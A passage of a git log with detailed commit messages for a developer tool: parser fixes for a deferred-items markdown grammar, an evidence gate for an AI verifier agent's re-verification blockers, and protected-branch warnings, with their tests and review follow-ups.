1; `matchListOpener` applies that rule wherever an ordered marker is seen,
with the run carried per list (headless) or per leaf-heading body. Numbers
after the first are ignored, as CommonMark ignores them. Stated cost,
pinned: a hand-numbered list starting at 2 reads as prose — every ordered
record in the #3702 scan starts at 1.
Both reviewer cases are pinned as prose; the ruling's `1. alpha / 2. beta`
shape still counts.
m1 — the 9-digit boundary is pinned at both sides (`999999999.` opens,
ten digits is not a marker), and the 3-vs-4-space indentation cliff is
pinned as deliberately NOT applied: the parser is indent-lenient because
surfacing a questionable hand-written entry beats dropping a real one.
* fix(#3702): thematic breaks close the list and fenced code never opens an entry (review M1, M2)
M1 — `- - -` was a phantom `"- -"` entry on base; widening the marker set
added `* * *` and `+ + +` to the class, and `* * *` is the separator an
author writing in the `*` style is most likely to use. A CommonMark §4.1
thematic break (plus the `+ + +` gesture, which is the same garbage as an
entry name) now closes the open entry on the headless path and is dropped
from the body on the heading path — neither an item nor a continuation.
M2 — neither splitter was fence-aware, so `+ `-prefixed diff lines and
`1.`-numbered repro steps inside a code block counted as entries; #3702's
wild records carry exactly those blocks. Both splitters now classify lines
by the sectionizer's own `scanFencedBlocks` (so `~~~`, indented and
unterminated fences behave as `stripFencedCode` would): fence content
never opens an entry, is continuation inside an open one — keeping the
span invariant `acknowledgeDeferredItem` re-verifies — and is discarded
before the first.
* test(#3702): range the #2287 deferred-items property over marker × shape × line ending (review B3)
The `#2287` property hard-coded `- ` and filtered `\r\n` out of its
arbitraries, so the widened marker set — an enumerated domain, exactly
what a property is for — was never under it. It now ranges over
`{-, *, +, ordered}` × `{headless, heading}` × `{LF, CRLF}`, with the
heading shape placing `**Status:**` first or last: the review's
prescription (markers × line endings) would not have reached B1, which
lives on the heading path only, so the shape axis is the load-bearing
addition. Ordered entries are numbered from 1, so the B2 run rule is
under the property too.
A second property drives `acknowledgeDeferredItem` over every unresolved
headless entry across the same marker × line-ending grid — the one that
reaches M4 (a CRLF rewrite that reported `ok` and wrote nothing) and m2.
* test(#3702): pin the milestone-close halt on a heading-delimited `*`/`+`/`1.` file (review m3)
A heading-delimited `deferred-items.md` written with a non-hyphen marker
previously parsed to zero entries and let `complete-milestone` close
silently; it now yields entries whose heading shape `acknowledgeDeferredItem`
refuses, which the milestone loop turns into `record_ack_failure` → exit 1.
The loop is prose in a workflow, so the test drives the two CLI calls it
makes: `audit-open --json` must list the entry, and
`audit-open acknowledge --text <the audit's own text>` must refuse with the
heading-delimited message and write nothing.
* docs(#3702): changeset and forensic-audit prose carry the round-2 grammar
The changeset names the CRLF fixes, the ordered start-at-1 rule, thematic
breaks and fences. The `/gsd-progress` forensic-audit step is the one
prose parser of this file and must state the same grammar the code has.
* fix(#3702): round-review refinements — run ends at a paragraph, rejected ordinals unstripped, breaks at any indent, fenced fields, `## Gaps` scope
Findings from the pre-push adversarial review of round 2, each pinned:
- An ordered run ENDS at a paragraph that follows a blank line (CommonMark
§5.3); a non-indented line with no blank before it is lazy continuation
and keeps the run open. `1. a` / blank / `paragraph` / blank / `5. x` is
one entry, not two.
- The heading path strips the marker off every body line before field
extraction (#3457); a line whose ordinal `matchListOpener` REJECTED must
not be stripped, or "3. status: resolved" as prose loses its `3. ` and
reads as a resolved field. `splitDeferredHeadingEntriesDetailed` now
carries a per-line opener flag and only accepted openers are stripped —
in headless regions of a heading-shaped file too.
- A thematic break is recognised at any indent, matching the parser's
indent-lenient reading of items; ` * * *` was a phantom `* *`.
- Fenced lines carry no FIELDS either: a `status: resolved` quoted inside a
code block no longer resolves its entry on either path.
- Block structure (breaks, fences) is a property of the GRAMMAR, carried as
`BulletMarkers.blockStructure`: the deferred set opts in, the Gaps set
does not, so `## Gaps` is byte-for-byte on its `next` behaviour — the
round-2 M1/M2 change had reached it through the shared splitter.
* test(#3702): the property exercises the rejected-ordinal branch; the N2 control is independent
Round review: the widened #2287 property numbered every ordered run from 1
and so never generated an ordinal the start-at-1 rule rejects — it could
not tell round 1 from round 2 on B2. Each entry may now carry a decoy prose
line beginning with a non-1 ordinal, placed where it cannot end a run
(before the first headless entry; first in a heading body), followed by a
`status: resolved` that must never become a field; and a decoy-only
heading body must yield no entry.
The N2 assertion accepted a tab, which round 1's `\s` accepted too, so a
`[ \t]` → `\s` revert alone stayed green. NBSP, form-feed and vertical-tab
are now asserted refused — the assertion that fails on that revert on its
own, and the disclosure that `[ \t]` narrows what round 1 accepted.
* fix(#3702): the splitter records its own opener flags; an opener clears the blank-line memory
Round-review continuation, two state defects in the ordered-run logic:
- `blankSeen` survived the headless splitter's opener branch, so an opener
followed by a lazy continuation line read as "paragraph after a blank" and
ended the run — `1. a` / blank / `2. b` / lazy / `3. c` folded `c` into `b`.
The opener branch now clears it.
- The heading path re-derived per-line opener flags for headless regions
without the paragraph reset, re-accepting a rejected `3. status: resolved`
under a stale run and stripping it into a field. `GapsEntrySpan` now
carries the flags the splitter itself computed, and the heading path reads
them; the re-derivation is deleted.
* fix(#3702): ordered-run memory is per indent — nested runs resolve, nested ordinals never inherit the top-level run
Round-review continuation 2: nested openers consulted the TOP-LEVEL run
flag and never wrote their own, so a nested `1. / 2.` run under a hyphen
entry rejected its `2. status: resolved` (round 1 resolved it), while a
nested `3. status: resolved` under a nested `- ` bullet inherited an open
top-level run and was stripped into a false field.
`OrderedRuns` keys the memory by indent: a new opener at indent d resets
every deeper level, a paragraph after a blank at indent d ends the runs at
d and deeper, a thematic break or a heading clears all. Both splitters use
it; the top level still decides entry boundaries, nested levels decide
only which continuation lines are accepted openers for field stripping.
Pinned for LF and CRLF.
* fix(#3702): run levels — one top level at or above the base, CommonMark column indents, a fence ends its level's runs
Round-review continuation 3:
- A dedenting top-level list (` 1.` / ` 2.` / `3.`) lost its entry
boundaries: the exact-indent run lookup rejected the shallower ordinals
before the boundary check ran. Every indent at or shallower than the
list's base is now ONE level, in both splitters.
- `indentOf` counted characters, so a tab and a space aliased to one level
and `\t1. nested` / ` 2. status: resolved` resolved falsely. Indent is now
measured in CommonMark columns (§2.2: a tab advances to the next multiple
of 4), for the run level and the entry-boundary check alike.
- A nested run survived a fenced block. A fence is a non-list block: its
opening delimiter ends the runs at its level and deeper, exactly as a
paragraph after a blank does.
* fix(#3702): the indent measure is grammar-scoped — Gaps keeps next's character count
`blockStructure: false` promised the Gaps grammar byte-for-byte parity with
`next`, but the CommonMark-column indent measure added for the deferred
grammar was shared by the whole splitter core, so tab-indented Gaps input
changed entry boundaries in BOTH directions:
`\t- a` / ` - b` — next folded into one entry, HEAD split into two
` - a` / `\t- b` — next split into two, HEAD folded into one
`indentWidth` now keys the measure on the grammar: columns for the deferred
set, raw character count for Gaps. The opt-out covers indent semantics, not
only fences and thematic breaks.
Four cases pin both halves — the two flipped Gaps pairs, the two Gaps pairs
that never moved, and the same tab/space pairs on the deferred path returning
the opposite (column-measured) verdict by design.
* fix(#3702): the acknowledge path reads and writes through one classifier
Round 3, Blockers 1 and 3, and Minors 7 and 8 — one mechanism, so one commit.
Every consumer of an entry's lines now reads the splitter's own per-line
verdict instead of a re-derivation of it.
B1. Round 2 widened the WRITER's status-line finder to the deferred marker set
while `extractGapEntryFields` still de-bulleted line 0 only. A nested
` * status: pending` was therefore selectable by the writer and invisible to
the reader: acknowledge rewrote it in place, returned `ok`, and the item stayed
outstanding on every later audit. Measured against a `next` build, `*`, `+` and
`1.` each resolved on base and stopped resolving at round 2's head — a
regression, not a gap in new behaviour. The hyphen form of the same shape was
already broken on `next` and is fixed here too: one classifier cannot be right
for three markers and wrong for the fourth.
`parseGapEntryFieldLine` is now the single place a line is classified as a
field, and it reports the offset at which the VALUE begins. The rewrite happens
at that offset rather than through a second regex, so a line the classifier can
select is one whose rewrite it has already located — the selection and the
rewrite cannot disagree. Both `DEFERRED_STATUS_FIELD_RE` and
`DEFERRED_STATUS_REWRITE_RE` are deleted rather than widened. A read-back guard
returns `rewrite_not_readable` rather than `ok`; it is unreachable by
construction today and is the fail-loud floor under the next divergence.
B3. This is the end state the round-3 review prescribed on both #3739 and
#3773: #3773's shared classifier, parameterised by this PR's marker set, with
this PR's two status regexes deleted. #3773 lands first. Its hyphen-only strip
is consistent with `next`'s hyphen-only splitter today, so the writer/reader
divergence is created by THIS merge, which is why widening every consumer
belongs to the PR that widens the domain.
m7. The heading path marker-stripped its lines before calling the reader, so
the reader's fence scan ran over text the splitter never saw: `- ```sh` is an
ordinary bullet to the splitter but strips to a fence opener, and a
`**Status:** resolved` after it was suppressed as fence content — a resolved
entry resurfaced as open. Stripping now happens inside the reader, after the
fence scan.
m8. `rawGapEntryText` stripped a marker off line 0 unconditionally, but on the
heading shape line 0 is the heading TEXT: `### 1. Race in the writer` was
silently renamed to `Race in the writer`, and the name is the key acknowledge
matches on. Line 0 is stripped only when the splitter accepted it as an opener.
Also removed: `splitDeferredHeadingEntries`, whose sole caller only null-checked
it (round 3, M4 — the claim was zero callers, which was wrong; the wrapper's
`.map` was waste at the one call site), and `stripLeadingBulletMarker`, which
this change leaves with no callers at all. The export surface narrows to the two
splitter regexes the behavioural parity test reads (M6).
[PEER-ASK pr-order-12d5]
q: Reviewer blocked both on merge order. I'm declaring #3773 lands first and
building the end-state shape into #3739 now (both my status regexes
deleted). Does that match your plan?
reply: CONFIRMED - same order, derived independently. #3773 cannot carry the
fold: `DEFERRED_BULLET_MARKERS`/`BulletMarkers` have zero occurrences at
`next` (verified), so the prescribed end state is not executable inside
#3773 without absorbing this PR's work.
deadline: 03:55 UTC (answered before it)
fallback: declare #3773 first, adopt end-state shape in #3739, push+comment
decision: proceeded as stated; #3773 lands first, this PR carries the widening
of every consumer.
Refs #3740
* test(#3702): pin the detect/strip symmetry, and drop a white-box test that could not reach it
Round 3, Blocker 2 and Minors 6 and 9.
B2. The regression shipped green because no fixture put a marker on a nested
status line. Four markers x {nested status line}, each asserting the entry
READS BACK as acknowledged rather than that acknowledge merely reported `ok` —
reporting `ok` over a line the reader skips is the whole defect. Plus the bare
capitalised `Status:` case (the reader stores it case-sensitively, so the
writer must not select it), and an idempotence test, which is the failure the
defect actually produced: the item resurfaces, is acknowledged again, and never
settles.
Each of these was run against the pre-fix build first: all five fail there and
pass here. Two further assertions in the block are labelled CONTROL because
they held pre-fix — they guard the new offset-based rewrite and the opener-flag
threading against regressing, and calling them regression tests for a reported
defect would overclaim.
M6. The round-2 parity test asserted that four writer-side regexes embedded the
same source string. That is true of a detect/read asymmetry too, so it could
not have caught B1 — and two of the four regexes were widened into `export =`
purely to let it read them. Replaced with a behavioural test that drives the
real seam: every marker that opens an entry must also resolve it through
acknowledge. The structural assertion is kept for the two splitter regexes,
which really are two copies of one alternation.
m9. `expectedResolved` was computed and immediately voided; the loop beneath it
already asserts both polarities.
m7/m8 coverage lands here too: a bullet whose content is a fence opener must
not suppress the entry's fields, and a heading beginning with a list marker
must keep it in the entry name.
* docs(#3702): document the deferred-items entry shape where the file is written
Round 3, Major 5, and #3702's own item 2. The widened grammar was documented in
the reader (`forensic-audit.md`) but not at the write site, where
`executor-examples.md` still said only "log to deferred-items.md" — so the
question the issue actually raised, which shapes count, remained unanswered
anywhere a human writes the file.
States what opens an entry (`-`, `*`, `+`, and `1.` when the list starts at
`1.`), that `1)` is not a marker here, that a separator closes the list and
fenced content is never an entry or a field, and that an entry without an
explicit `status: resolved` stays open by design.
* chore(#3702): regenerate the changeset through the generator
Round 3, Minor 10. The fragment was hand-named against 64 generated names on
`next`, and its body ran ~250 words against CONTRIBUTING's one-sentence form.
Regenerated via `npm run changeset`, which is also what the random three-word
name is for: concurrent PRs never collide.
* fix(#3702): the fence gate lives on the seam both sides call, not just the reader
Found by the pre-push adversarial review of this round, and it is a regression
this round introduced rather than a pre-existing one.
`extractGapEntryFields` applied `fencedLineSet` before classifying; the
acknowledge writer's status-line search did not. So a `status:` line inside a
fenced block was SELECTED by the writer and SKIPPED by the reader — the write
produced a line nothing reads, the read-back guard refused it, and the entry
became impossible to acknowledge at all: `audit acknowledge` raised an internal
error and `complete-milestone` halted on it.
Measured, `- alpha` / fence / ` status: pending` / fence:
next ack=ok -> reads back "acknowledged"
round-2 head ack=ok -> reads back "" (the B1 defect)
before this ack=rewrite_not_readable -> refuses entirely (worse than next)
`entryFieldLines` is now the seam — per line of an entry, the field it declares
or `null`, fences included — and the reader and the writer both go through it.
That makes "the writer cannot select a line the reader will not read back"
structural rather than asserted, which is what the previous commit's message
claimed while a second read-side filter still lived outside the classifier.
Two comments corrected with it. The read-back guard is NOT "unreachable by
construction": this round shipped a reachable path to it, which is precisely
what an invariant asserted in a comment is worth. And the M6 replacement test
put its marker only on the entry opener, so it passed against the defective
build — the exact weakness it was introduced to fix in round 2's test. It now
marks the nested status line too, and fails pre-fix like the rest.
Round-3 tests against the pre-fix build: 10 of 12 fail there, and the 2 that
hold are labelled CONTROL because they guard this round's new code rather than
pin a reported defect.
* fix(#3702): one end-of-file CRLF algorithm, adopting #3773's with its B4 closed
Round-4 M1. Two open PRs shipped two different answers to "what line ending
does an entry that ENDS THE FILE get?", and the review's ruling was that the
disagreement needs one answer, not two. Neither shipped answer was that one.
Measured on builds of both heads:
case #3739 r3 #3773 here
undelimited single entry, CRLF preamble pass FAIL pass
LF-dominant list, one stray CRLF at EOF FAIL pass pass
(the other five) pass pass pass
This PR's content.endsWith('\r\n', matchIndexInContent) reads the terminator of
the PREVIOUS line, so it propagated an isolated CRLF into an LF-dominant list --
refuted by #3773's own LF-dominant fixture, ported here. Withdrawn.
#3773's crlfAtEof asks the right question -- does anything before the entry,
within scope, contradict CRLF -- and fails closed. But its scope goes EMPTY for
an undelimited single-entry list, because the entry-list region runs from the
first entry's start to the insertion point and those coincide; crlfAtEof('') is
false by its own before.length > 0 guard, so 'preamble\r\n\r\n- alpha' gained a
bare \n in a CRLF document. That is #3773's B4, verified by driving its head.
Adopted here with the scope widened to everything preceding the insertion point
where the preferred region is empty, rather than asserting LF from no evidence.
That only ever loosens a scope carrying zero information, and the predicate
stays fail-closed over the wider one. An entry at offset 0 of an undelimited
document has no evidence under either scope and stays LF.
Tests: 10 added. Negative control, driven -- 1 of the 10 fails against this
branch's own pre-fix head (the stray-CRLF fixture); B4 fails against #3773's
head; the remaining 8 are the scope counterexamples ported with the function,
which were regression pins in #3773 and are guards here. Each still kills a
simpler algorithm: drop any one and a refuted scope passes again.
Four deferred-items suites 450/450, 0 skipped. npm run lint:ci exit 0.
* fix(#3702): drop the unreachable rewrite_not_readable guard (B3)
Round-4 B3: the status had zero test coverage in either file. The review
offered two branches -- drive it from a test, or delete it and stop carrying an
untested terminal status. Taking the second, with the reason stated rather than
assumed.
Why it cannot be driven. Round 3 added the guard after a fenced `status:` line
proved the writer could select a line the reader would not read back. Round 3
then closed that divergence STRUCTURALLY, by routing the writer's line selection
and the reader's field extraction through one entryFieldLines seam. The guard
now detects a state construction prevents: 21 document shapes were driven
against it -- fence openers on the bullet line for every marker in the widened
set, duplicate and triplicate status lines, bolded and nested variants, fences
between duplicates -- and none reached it. The only seam that would is routing
the internal call through the module's exports so a test could stub it, which
reshapes production surface for a test.
Why leaving it undriven is not free. RULESET.TESTS.mutation-score runs Stryker
incrementally over changed files at an 80% threshold and says to treat a
surviving mutant as a failing test specification. An undriven `if` on a changed
file is exactly that, on both the condition and the .toLowerCase() comparison.
What this gives up, stated rather than hidden: if a future change re-splits the
writer's selection from the reader's extraction, acknowledgeDeferredItem returns
ok over an item that stays outstanding -- the original #3702 defect class. One
correction to the review's framing: match_verification_failed does NOT backfill
it. That check runs BEFORE the write and compares the matched span to the
target, so it cannot see a post-write read-back failure. The protection against
re-splitting is the shared seam and the round-3 tests that pin it, not a runtime
assertion. A comment at the removal site records all of this.
Removing it also drops the union member from both files, which resolves the PR
body's internal contradiction (it claimed no type-signature changes while adding
one) and the duplicate-status surface #3773 collides on.
No test changed behaviour: 450/450 across the four deferred-items suites, 149/149
across the audit suites, npm run lint:ci exit 0 -- the same figures as before the
removal, which is itself the evidence that nothing exercised the branch.
* fix(#3702): the deferred fence gate is indent-unbounded, like the rest of the grammar (M2)
Round-4 M2. scanFencedBlocks is CommonMark, which caps a fence delimiter's
indent at three spaces -- a fourth makes it an indented code block instead. This
grammar had already opted out of that cliff for entry openers ([ \t]*) and for
THEMATIC_BREAK_RE (^[ \t]*), but not for fences. So a fence at four spaces was
not a fence to the gate, and a `status: resolved` line inside it RESOLVED the
entry containing it.
That is not an exotic shape. A fenced block written under a NESTED bullet sits
at four spaces, so ordinary hand-written deferred-items.md files reach it.
Driven before the fix at indents 4, 5, 8 and a leading tab: all four silently
resolved. It is the #3702 silent-resolution defect class in a new place.
gsd-core/references/executor-examples.md, added by this PR, states flatly that
"nothing inside a fenced code block is an entry or a field". The review offered
fixing the parser or bounding that claim in three places. Fixing it -- the claim
is the one users will rely on, and the grammar had already chosen unbounded
indent everywhere else.
NO second fence dialect (the rule blankIndentedFenceDelimiters states). The
classification is still done by scanFencedBlocks, the one exported CommonMark
state machine, over a de-indented VIEW of the same lines. Run lengths, backtick
vs tilde, closer-must-match-and-not-trail, info-string rules and the
unterminated-at-EOF case remain that engine's answers. Indent is the only
dimension hidden from it, and it is exactly the dimension this grammar has
already declared it does not measure. Index alignment is 1:1 -- map preserves
length -- so every returned line index still addresses the original line.
Scope is the deferred grammar only. Both marker-parameterised call sites gate on
markers.blockStructure, which the Gaps set does not set, so Gaps reaches an empty
set. Verified, not asserted: the 47-fixture Gaps differential (marker x
line-ending x separator x fence x break x key-shape x list-shape) is
BYTE-IDENTICAL across this change, 8033 bytes both sides.
Tests: 14 added, of which 8 fail against the pre-fix source and pass here; the
other 6 are the deliberate controls -- indents 0 through 3, which must NOT move,
and the Gaps opt-out guard.
Four deferred-items suites green; the 58 suites touching uat/deferred/sectionizer
run 6045 tests with an IDENTICAL failing set before and after this change (17
pre-existing environment failures -- installs and an unpinned GSD_EMITTED_BASE;
emitted-attribution passes 259/259 in isolation with its base pinned). lint:ci
exit 0.
* fix(#3702): changeset, both prose parsers, and the minors (M3, M4, m1-m3, m5, n1-n2)
M3 -- the changeset omitted a user-BREAKING change. Measured against next: a
heading-delimited deferred-items.md written with `*`, `+` or `1.` went from
"0 entries, so complete-milestone has nothing to acknowledge and closes" to
"1 entry, the CLI writer refuses the heading shape, ACK_FAILURES accumulates,
exit 1". The `-` form already halted and is unchanged. That is release-note
material: a close that used to succeed now fails, and the correct response is to
fix the file, not revert. Also names the fence-indent fix below, and adds #3740
so #3773's issue is attributed here as it is absorbed.
M4 -- gsd-core/workflows/progress/steps/forensic-audit.md is a SECOND,
model-executed parser of the same grammar, and prose cannot carry a parity test.
Its widened text stated the start-at-1 rule, fences and separators but not the
`1)` exclusion nor the nine-digit ordinal cap, both enforced in code with pinned
tests. Both stated now, along with the round-4 fence-indent rule. (No ack
fragment: the size ratchet's currentSizes does a NON-recursive readdirSync of
gsd-core/workflows and agents, so a file under workflows/progress/steps/ is
outside its scope -- verified by reading the helper, not by the green.)
n1 -- executor-examples.md documented that the BOLDED status key is matched
case-insensitively and left the bare key's rule to inference. Driven: bare
`Status: resolved` is NOT read, so the entry stays open with no warning, while
`**Status:**` is. Stated explicitly, with the digit cap and the any-indent fence
rule (n2).
m1 -- boundary coverage was 2/3. limit (999999999.) and limit+1 (1234567890.)
were pinned; limit-1 (12345678.) added, per RULESET.TESTS.boundary-coverage.
m2 -- THEMATIC_BREAK_RE and the tab-expanding indent counter are hand-rolled
CommonMark rules with no in-repo peer to compare against, so the parity
assertion is against the SPEC: eight positive and five negative fixtures, plus
the two DELIBERATE divergences pinned as deliberate (`+` is a separator here but
not in CommonMark, because `+` is a list marker in this grammar and `+ + +`
would otherwise be a phantom entry; indent is unbounded). One fixture was
initially wrong -- `-- -` IS a CommonMark break, since the spec allows free
spacing between the three characters -- and the parser was right.
m3 -- the result union is hand-duplicated in audit.cts as part of a deliberate
structural view of uat.cjs, so the fix is not to delete a copy but to make drift
observable. Every REACHABLE status is now driven from a fixture; four of the six
(ambiguous, unsupported_heading_shape, already_resolved, match_verification_failed)
had no assertion anywhere in the suite before this. match_verification_failed is
still undriven and the test says so rather than omitting it.
m5 -- DECLINED, with the measurement. The review is right that `(\s*)` in the
opener and `/^[ \t]*/` in the reader disagree about \f, \v and NBSP, but its
prescribed narrowing was implemented, driven and REVERTED: as shipped, an entry
indented with any of those surfaces, parses its status field, acknowledges, and
reads back acknowledged -- a complete round-trip. Narrowing turns all three into
SILENTLY DROPPED entries, which is the #3702 defect class itself and the opposite
of this file's stated fail-safe rule. A latent inconsistency in the safe
direction is not worth a live regression in the unsafe one. Pinned by three
round-trip tests so the prescription cannot be re-applied silently; if it is ever
closed, the direction is to make the readers agree with the opener, not to make
the opener reject lines it accepts today.
Four deferred-items suites 475/475, 0 skipped. lint:ci and lint:changeset exit 0.
The 47-fixture Gaps differential is byte-identical at 8033 bytes.
* fix(#3702): the pinned `## Gaps` phantom now cites its issue (m4)
Round-4 m4. The second assertion in the Gaps byte-for-byte test pins a real
defect as expected output: a spaced hyphen thematic break in `## Gaps` is read
as an ITEM, so `- - -` surfaces a phantom open gap named `- -`. Reproduced on
pristine next at
|
||
|
|
6beaa66b25 |
enhance(#3304): gate re-verification blockers on deterministic evidence (#4085)
* test(#3304): add failing-first suite for the convergence evidence gate Content-assertion suite for the Step 7 re-verification evidence gate (agents/gsd-verifier.md / gsd-core/references/verifier-evidence-gate.md). Committed before the implementation to prove RED via gsd-test. * enhance(#3304): gate re-verification blockers on deterministic evidence Step 7's anti-pattern scan re-runs at full, unbounded scope on every re-verification pass, independent of the must-haves established in Step 2. A blocker it finds — other than the self-evidencing debt-marker check — previously reverted a completed gap-closure round and started another --gaps cycle on nothing more than the verifier's own new judgment call, with no bound on how many times that could repeat. A Step 7 blocker now blocks unconditionally in re-verification mode only if it is a carried-forward gap (present in the prior VERIFICATION.md's gaps: list) or the flagged file was git-modified since the prior pass (a regression; fails closed toward blocking when history is unresolvable). Otherwise it predates the gap-closure round unflagged and needs deterministic evidence — a named test run red, or another concrete reproducible artifact — to stay blocking. Unevidenced, it downgrades to a new advisory: frontmatter list and report section instead of setting status: gaps_found, and never reverts a completed must-have. Maintainer approval was narrowed to this evidence condition only, explicitly rejecting the broader "advisory whenever untraceable to a requirement/decision/prior-gap" proposal — implemented and pinned by tests/verifier-evidence-gate.test.cjs and documented as rejected in gsd-core/references/verifier-evidence-gate.md so it can't silently re-expand. Closes #3304 * fix(#3304): correct window-truncation and indentation bugs in evidence-gate tests gsd-test's GREEN checkpoint caught 3 real bugs in the test file itself (not the production prose): a {0,600} match window was shorter than the 724-char paragraph it was scanning (the "exclude from Step 9 Rule 1" phrase starts at offset 662), and two regexes assumed no indentation after a markdown list-continuation line break. All three phrases are confirmed unique across agents/gsd-verifier.md, so the windowed submatches are replaced with direct whole-string assertions instead of just widening the window. Also acknowledges the deliberate byte growth in agents/gsd-verifier.md that the differential-attribution check (ADR-2719) correctly flagged. Emitted-Drift-Ack-Growth: gsd-verifier.md — adds the #3304 re-verification evidence gate (Step 7 rule, Advisory bucket, advisory: frontmatter, report section); 1488 bytes, still within the LARGE-tier 48 KiB cap (48751/49152). * docs(#3304): backfill changeset PR number --------- Co-authored-by: sim <sim@local> |
||
|
|
8487f0ed42 |
enhance(#3552): warn on additional protected branches beyond the resolved base branch (#3648)
* test(01-01): add failing protected-branch warning coverage - pin configured, absent, and malformed branch-list behavior - require opposite CLI and execute warning outcomes * feat(01-01): warn on configured protected branches - resolve the base branch union configured protected branch names - expose exact boolean CLI comparison output for workflow callers - keep execute-phase warning advisory and within its byte budget * test(01-01): add failing protected branch config coverage - cover valid list persistence and null unset - reject hostile shapes while preserving the prior value * feat(01-01): validate protected branch configuration - register git.protected_branches as a canonical config key - require a non-empty array of non-blank branch names * test(01-02): add failing ship protected-branch controls - Execute both workflow warning blocks with exact predicate arguments - Require true and false results to produce opposite warning outcomes - Preserve the none-strategy feature-branch offer contract * feat(01-02): warn at ship on protected branches - Reuse the typed protected-branch predicate in ship preflight - Keep raw base resolution for PR targeting and advisory branch creation - Prove execute and ship warning blocks with opposite-result controls * test(01-02): add failing protected-branch docs parity - Require the canonical schema key in both English config references - Pin the non-empty string-array type and absent default - Require synchronized multi-branch examples and advisory semantics * feat(01-02): publish protected branch configuration contract - Document the optional non-empty string-array field in both references - Explain resolved-base union and absent-field compatibility - Keep execute and ship warnings advisory under branching_strategy none * fix(01): CR-01 honor active workstream branch policy * fix(01): WR-01 assert protected config path selection * docs: add changeset fragment for #3648 Co-Authored-By: Claude Sonnet 5 <noreply@anthropic.com> Claude-Session: https://claude.ai/code/session_017CteVPJt4BkPmroMPGajYx * fix(#3648): resolve base_branch precedence inversion and round-1 findings Blocker 1/2: production config resolution was flat-first, so a project that migrated to git.base_branch but still carried a stale flat base_branch got the old value back. Add base_branch to normalizeLegacyKeys (mirrors the existing branching_strategy/sub_repos pattern: canonical nested wins) and route readEffectiveGitConfig's test seam through the same normalization so it can't silently diverge from production again. Adds a regression test with both keys set that fails without the fix. Blocker 3/4/5: restore the handle_branching case-selector prose and "none" contract sentence that #3389's tests anchor on, and revert the unrelated prose/comment compaction in the same step — both were drive-by edits outside #3552's scope. Also addresses review majors/minors: delete readConfigBaseBranch and readConfigProtectedBranches (dead in production, only self-tested); --is-protected now fails closed (reports protected) instead of silently answering false when the base branch can't be verified; trim configured protected-branch names; fix HOME-without-USERPROFILE vacuous isolation on Windows; correct the drift-ack's byte accounting. Co-Authored-By: Claude Sonnet 5 <noreply@anthropic.com> Claude-Session: https://claude.ai/code/session_01S44stkuQbhD3jTCtKzte5N * test(#3648): add failing legacy-key hoist safety coverage Round-2 review found normalizeLegacyKeys block 5 records a normalization carrying the DISCARDED flat value on the canonical-wins branch. Probing that turned up a second, unreported defect in the same helper shape: blocks 1, 2 and 5 all spread result['git'] / result['planning'] with no object guard, so a config whose section key holds a string is spread into index keys — {"git":"main","base_branch":"release"} -> {"git":{"0":"m","1":"a","2":"i","3":"n","base_branch":"release"}} The resolved value is accidentally still correct, so nothing fails and no diagnostic fires. But normalizations.length > 0 sets configDirty, and config-loader then serializes that shape back into the user's config.json — a read that silently corrupts config. The deleted #3057 W3 suite covered {"git":"main","base_branch":"release"} explicitly; this is the input it would have caught. Covers both defects across blocks 1 and 5, with object/array/null negative controls that must stay green in both phases, and a fast-check property over arbitrary `git` values. * test(#3648): pin fail-closed handling of malformed protected_branches Replaces the test that pinned the fail-OPEN behaviour. The old assertion — ['develop', 42] yields isProtected === false for 'develop' — locked in the exact failure #3552 exists to close: config-set validation is bypassable by a direct edit of .planning/config.json, so a user who believes 'develop' is protected got a silent false and no warning. It was also inconsistent with the fail-CLOSED direction twelve lines away, where an unverified base reports protected and writes a diagnostic. A protection predicate must not have two opposite failure directions depending on which input is bad (#3648 review Blocker 3). New coverage: a bad element drops only itself, a non-array contributes no names, an empty list is well-formed rather than malformed, and --is-protected surfaces the rejection. Both negative controls — a clean list reports nothing rejected and writes no diagnostic — must stay green in either phase, so the reject channel cannot fire unconditionally. * fix(#3648): drop only invalid protected_branches and report them Partition git.protected_branches instead of discarding the whole list on one bad element, and carry the rejections out through ProtectedBranchStatus so --is-protected can name them on stderr. Valid names keep protecting; the user finds out the rest were ignored. A non-array value still contributes no names — a bare string is not a list of branch names — but is now reported rather than swallowed. An empty array stays silent: declaring no extra protected branches is a valid choice, not a misconfiguration. writeDiagnostic is hoisted out of the unverified-base branch since both arms now use it. * test(#3648): prove the predicate diagnostic survives both call sites The workflow bash stub now emits a stderr diagnostic the way the real command does, which is what makes a swallowed `2>/dev/null` visible to a test — previously the stub was silent on stderr, so discarding it changed no observable behaviour and the call sites could drop the explanation undetected. Adds the Minor 2 binding check as well: ship must expose the predicate result as IS_PROTECTED rather than only echoing a warning, asserted by running the extracted bash and reading the bound value, not by grepping the workflow source. Both tests carry opposite-outcome controls — an empty diagnostic must leave the text absent, and a false predicate must bind false. * fix(#3648): surface the predicate diagnostic and bind ship's result Drop `2>/dev/null` from the --is-protected call at both call sites. The fail-closed explanation and the new rejected-entry warning both go to stderr, so discarding it left the user with a bare "protected branch" warning on a branch that is not protected and no way to tell a real match from a degraded-git guess. `git branch --show-current` keeps its own redirect — that one is genuine noise. ship.md binds IS_PROTECTED and its prose now branches on the variable, so the following steps have evaluable state instead of having to infer it from warning text in tool output. execute-phase.md byte accounting refreshed: 92326 -> 92645, net growth 319 bytes (was 331 before the redirect came out). Baseline re-verified against the current rebase base by blob id; the ceiling check passes with 755 bytes of margin. * test(#3648): restore negative space for the readFile config seam The #3057 W3 suite was deleted with readConfigBaseBranch, but every arm it pinned survives verbatim in readEffectiveGitConfig's readFile branch — the JSON.parse catch, the non-object guard, the git-section object guard, .trim() and blank-string rejection — and the four surviving readFile injections were positive-path only. protected_branches was never driven through this seam at all. Restores nine cases against the seam, including protected_branches partitioning, plus a control proving loadConfig still wins when both seams are supplied. Records honestly what the suite pins. Mutating the built lib shows .trim() is KILLED, while the non-object guard and the blank-string rejection SURVIVE — both are unreachable through this entry point for the same reasons the deleted suite documented against its own equivalents: a JSON-parsed non-object carries no relevant own-property either way, and a blank value is rejected a second time downstream by the resolver's truthiness check. They stay as defence-in-depth and are labelled known-unkillable rather than left looking like coverage this suite does not provide. * test(#3648): distinguish detached HEAD from a missing branch argument `args[1] ?? ''` collapsed two different situations into one: a detached HEAD, where `git branch --show-current` legitimately prints nothing, and the flag being called with no argument at all. Both answered false, so the right outcome arrived by an unintentional path and a caller bug was indistinguishable from normal operation. Asserts the detached case stays silent and the missing-argument case reports, with a control that the two diagnostics differ. * fix(#3648): report a missing --is-protected branch argument Answer false either way, but say so when the flag arrives with no argument. A detached HEAD passes an explicit empty string and stays silent, since that is a normal state rather than a misconfiguration. * docs(#3648): state exact-name matching 